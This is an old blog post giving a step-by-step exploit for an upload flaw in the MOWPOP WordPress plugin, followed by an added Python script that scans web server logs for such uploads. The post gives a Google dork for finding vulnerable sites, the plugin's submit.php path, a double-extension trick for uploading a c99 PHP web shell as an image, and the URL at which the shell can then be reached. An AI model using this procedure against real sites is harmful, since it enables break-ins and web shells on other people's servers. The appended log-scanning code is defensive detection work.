Tuesday, April 10, 2012

[MOWPOP] Plugin WP-CONTENT In WordPress Upload Exploitation




Google Dork : inurl:mowpop
For each site the dork returns, go on to /wp-content/plugins/mowpop/submit.php.
For example, if the site that comes up is www.target.com/topics/mowpop, go to www.target.com/wp-content/plugins/mowpop/submit.php.
You will find that it allows image uploads. Change the shell's file type to an image file type.
For example, c99.php%.gif.
The shell you uploaded can then be accessed through the following directory:
wp-content/plugins/mowpop/editor/forms/pictures/User-Uploads/c99.php%5C0.gif
For example, www.target.com/wp-content/plugins/mowpop/editor/forms/pictures/User-Uploads/c99.php%5C0.gif
REF:1337 Days

post by ghost area(ghostarea.net)
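
From the defender's side, the file name used above carries a .php segment ahead of the final .gif. The following added example (not part of the original post) flags requests for such names in web server access logs; the log format, sample lines, extension list and function names are assumptions made for illustration.

```python
import re
from urllib.parse import unquote, urlsplit

# Upload directory named in the post; swap in any user-writable web path.
UPLOAD_DIR = "/wp-content/plugins/mowpop/editor/forms/pictures/User-Uploads/"
# Extensions commonly mapped to the PHP interpreter (assumed list; match your server config).
SCRIPT_SEG = re.compile(r"^(php\d?|phtml|phar)(?![a-z0-9])")
# Characters that have no place in a stored image name: controls, backslash, percent.
ODD_CHARS = re.compile(r"[\x00-\x1f\\%]")
# Minimal combined-log matcher: client IP, method, request target, status.
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3})')

# Constructed sample log lines (documentation IP ranges), not real traffic.
SAMPLE_LOG = [
    '203.0.113.7 - - [10/Apr/2012:10:01:02 +0000] "POST /wp-content/plugins/mowpop/submit.php HTTP/1.1" 200 512',
    '203.0.113.7 - - [10/Apr/2012:10:01:09 +0000] "GET ' + UPLOAD_DIR + 'c99.php%5C0.gif HTTP/1.1" 200 4096',
    '198.51.100.4 - - [10/Apr/2012:10:05:00 +0000] "GET ' + UPLOAD_DIR + 'holiday.gif HTTP/1.1" 200 20480',
]


def name_findings(filename):
    """Return reasons a stored upload name is suspicious; empty list means clean."""
    reasons = []
    segments = filename.lower().split(".")[1:]
    # Inspect every dot-separated segment, not just the last one.
    if any(SCRIPT_SEG.match(seg) for seg in segments):
        reasons.append("script extension in file name")
    if ODD_CHARS.search(filename):
        reasons.append("control, backslash or percent character")
    return reasons


def scan_log(lines):
    """Return (ip, method, decoded_path, status, reasons) for flagged upload requests."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        ip, method, target, status = m.groups()
        # Decode percent-escapes so %5C and similar are checked as real characters.
        path = unquote(urlsplit(target).path)
        if not path.startswith(UPLOAD_DIR):
            continue
        reasons = name_findings(path.rsplit("/", 1)[-1])
        if reasons:
            hits.append((ip, method, path, int(status), reasons))
    return hits


if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(hit)
```

The same `name_findings` check can be run over a listing of the upload directory to find files that were stored but not yet requested.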
